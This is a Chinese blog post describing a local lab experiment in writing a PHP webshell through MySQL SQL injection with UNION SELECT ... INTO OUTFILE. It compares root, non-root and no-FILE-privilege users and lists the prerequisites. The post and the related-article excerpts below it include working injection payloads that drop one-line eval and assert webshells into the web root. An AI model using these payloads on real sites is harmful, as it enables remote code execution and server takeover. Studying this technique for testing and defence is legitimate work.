对SQL注入写webshell的实验

最新推荐文章于 2024-08-22 22:13:41 发布
最新推荐文章于 2024-08-22 22:13:41 发布
阅读量419 收藏 3
点赞数 7
分类专栏: 提权笔记 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangqiao258/article/details/140110269
版权

一、在ROOT用户下写入

1.知道网站绝对路径
2.数据库ROOT权限
3.secure_file_priv不为NULL,为空或为网站路径

查询mysql路径,猜测网站绝对路径

' union select 1 ,@@datadir --+-

在这里插入图片描述

查询当前用户

' union select 1 ,user() --+-

在这里插入图片描述

查询secure_file_priv

show global variables like '%secure%'

在这里插入图片描述

写入webshell

' union select 1 ,'<?php eval($_POST["pass"]); ?>' into outfile%20 'C:\\phpstudy_pro\\WWW\\shell.php' --+-

在这里插入图片描述

测试shell
在这里插入图片描述

二、在非ROOT用户下写入

创建一个非ROOT用户,权限如下
在这里插入图片描述

查询用户
在这里插入图片描述

写入webshell
在这里插入图片描述

测试webshell
在这里插入图片描述

三、取消FILE权限非ROOT用户下写入

在这里插入图片描述

查询用户
在这里插入图片描述

写入webshell,失败
在这里插入图片描述

修改file权限再尝试,成功
在这里插入图片描述
在这里插入图片描述

结论:

1.知道网站绝对路径
2.数据库file权限
3.secure_file_priv不为NULL,为空或为网站路径

~王
关注
专栏目录
利用SQL注入植入 webshell
小白渣的博客
02-27 6456
这里小结一下通过SQL注入WebShell的方法。 传统的SQL语句shell 通过SQL注入select into outfile实现,如: 1' union ...
网络安全--SQL注入文件
weixin_43774199的博客
09-24 731
课程任务:讲解MySQL读文件的条件,教会学生配置MySQL的导入导出功能和用户权限的修改。组织实验使学生掌握load_file()、into outfile / into dumpfile()三个函数的使用,了解它们的区别。 任务目标:了解MySQL读文件的条件,学会配置MySQL的导入导出功能和用户权限的修改,掌握load_file、into outfile / into dumpfile()三个函数的使用,了解它们的区别。 A.读文件的基本条件和使用 SQL注入文件读 SQL注入有直接
SQL注入webshell
bring_coco的博客
03-13 6453
前言 在所有常用的关系数据库管理系统中均包含内置的向服务器文件系统文件的功能,通过这些内置的功能,我们可以将自己的webshell目录或文件进去 webshell条件 1.MYSQL用secure_file_priv这个配置项来完成对数据导入导出的限制, 如果secure_file_priv=NULL,MYSQL服务会禁止导入和导出操作。 如果secure_file_priv=/tmp/,MYSQL服务只能在/tmp/目录下导入和导出 如果secure_file_priv="" ,MYSQL
Web漏洞介绍和Sql注入漏洞
最新发布
2401_82505448的博客
08-22 571
常规渗透测试流程漏洞探测包括:web漏洞测试,系统漏洞测试工具探测、手工验证优先找的漏洞:中间(件)漏洞、框架漏洞...webserver可以在这查漏洞poc自动化漏洞检测脚本exp漏洞利用脚本(工具)
SQL注入得到WEBSHELL
11-15 1040
一.通过SQL注入得到WEBSHELL的原理: N.E.V.E.R的方法:利用数据库备份得到WEBSHELL。创建一个表,在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来,最后再删除新建的表。 分析: N.E.V.E.R利用了MSSQL的备份数据库功能。把数据导出来,设想数据库中有之类的ASP标实符,导出文件,文件名以.ASP的形式保存。然后文件又保存在WEB
SQL注入webshell
huangyongkang666的博客
03-25 3008
SQL注入webshell 1.MySQLshell WebShell的几种方式 1、利用Union select 入 需要满足的条件 对web目录有权限 GPC关闭(GPC:是否对单引号转义) 有绝对路径(读文件可以不用,文件需要) 没有配置secure-file-priv ?id=1 union select '<?php assert($_POST["cmd"]);?>’ into outfile 'D:/WWW/evil.php' ?id=1 union select
SQL注入WebShell&&DNSlog注入(配合盲注)
weixin_51339377的博客
03-22 573
SQL注入webshell 1.什么是一句话木马 一句话木马是一种短小但是功能完善的木马客户端,通过它我们可以构造系统命令执行,从而 达到控制操作系统的目的。它的隐蔽性好,功能强大。一般来说渗透过程中遵从先传小马,再传 大马的逻辑。 我们把恶意的函数入到文件里去,通过访问文件,搭建平台会执行文件中的参数,而这个文 件可以被我们利用来执行操作,从而达到了控制目标操作系统的目的。 方法1: 有三个条件: 1.首先需要知道远程目录(猜测+经验) 可以通过@@basedir 查询...
演示DVWA靶场实验环境-使用SQL注入漏洞获取Webshell
# 1. 导言 ## 1.1 什么是DVWA(Damn Vulnerable Web Application...SQL注入漏洞是指Web应用对用户输入的信息没有进行充分过滤和验证,导致攻击者可以通过构造特定的SQL查询语句,从而实现对Web应用的数据库进行非授权
php mysql 注入一句话木马_渗透技术--SQL注入一句话木马原理
weixin_39800387的博客
02-19 2468
讲一下SQL注入一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子:SELECT * INTO OUTFILE 'C:\log1.txt'这样就可以把查询到的数据入到C盘的log1.txt这个文件里面。利用这个原理我们可以把PHP的一句话木马到磁盘上从而拿到webshell。本地的目标站点来实战一下,我们的目的是在目...
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 012-网络安全应急技术与实践(Web层-SQL注入
热门推荐
时光隧道
02-09 8万+
Web层攻击分析与应急响应演练是指对Web应用程序进行攻击分析,发现潜在的漏洞和安全威胁,并在发生安全事件时能够迅速做出应急响应措施的过程。进行Web层攻击分析是为了了解Web应用程序存在的弱点和漏洞,从而提前对其进行修复和加固。攻击分析可以包括对Web应用程序进行安全扫描、漏洞评估和渗透测试等活动,通过模拟真实攻击场景,发现可能被黑客利用的漏洞,如SQL注入、跨站点脚本攻击(XSS)、跨站点请求伪造(CSRF)等。攻击分析的目的是为了及早发现和修复潜在的安全问题,确保Web应用程序的安全性。
基于Access数据库的SQL注入攻击研究.pdf
09-19
实验中使用了逐字猜解法来进行SQL注入,并对脚本进行了优化,以提高注入效率和准确性。这一过程中,作者详细描述了环境搭建步骤,并且分享了测试页面的截图(由于文本中未给出图1的内容,此处不展开),提供了实际的...
SQL注入入文件方法(获取webshell
Goodric的博客
04-08 2861
1、当前数据库用户为 root 权限 2、知道当前网站的绝对路径 3、secure_file_priv 的参数必须为空或目录地址 4、PHP的 GPC 为 off状态;(魔术引号,GET,POST,Cookie)
SQL注入Webshell
weixin_43749601的博客
03-28 2943
前言 在平时的CTF题目中,我们只是利用SQL注入漏洞去获取flag,但是在实际的渗透环境中,我们可以利用SQL注入漏洞去上传一个webshell,进而获取网站的后台权限。 首先,对于能否webshell是有条件的: secure_file_priv 支持数据导出。MySQL用secure_file_priv这个配置项来完成对数据导入导出的限制。如果secure_file_priv=NULL,MySQL服务会禁止导入和导出操作。通过命令查看secure-file-priv`的当前值,确认是否允许导入导
sql注入和phpmyadmin日志webshell
weixin_54813510的博客
05-25 1963
webshell的前提条件:1、需要root权限。2、知道网站根目录的绝对路径。3、数据库my.ini配置文件需要secure_file_priv配置为空。
SQL注入Webshell(Lines terminated by入)
faclon666的博客
03-31 848
在输出每条记录的结尾或开始处插入webshell内容,所以即使只查询一个字段也可以webshell内容。找到物理路径,但是这是个布尔注入,只返回真假。因为是同一网站,尝试使用上篇文章找到的物理路径来webshell。1.当mysql注入点为盲注或报错,Union select入是不能利用的,那么可以通过分隔符入(SQLMAP的–os-shell命令,所采用的就是这种方式)页面仅显示有无用户,无其他报错信息,初步判断用布尔盲注。(菜鸟一枚,日常记录,的不对的地方欢迎大家指正)
WebShell通过SQL语句管理MSSQL
chengjingdeni的专栏
08-07 494
<br />   最近在做一个网络安全相关项目的渗透测试,在拿到了服务器的webshell之后,需要进一步渗透,服务器上有较高权限的软件只剩SQL Server 2005了,而且在webshell中通过SQL Server 2005提权拿到系统权限,由于拿到webshell的服务器在内网,通过防火墙做了端口映射,无法直接使用SQL Server管理工具进行管理,就需要通过webshell执行SQL 语句来操作SQL Server数据库,其中用到了一些非常规的SQL语句,列举一些sql语句来介绍数据库,数据表
实战演练:从SQL注入WebShell获取
weixin_43822401的博客
07-12 603
SQL注入漏洞是Web应用程序面临的主要安全威胁之一。本文通过一个实战案例,详细演示了从识别SQL注入漏洞到获取WebShell的完整攻击链,旨在提高网络安全专业人士的防御能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值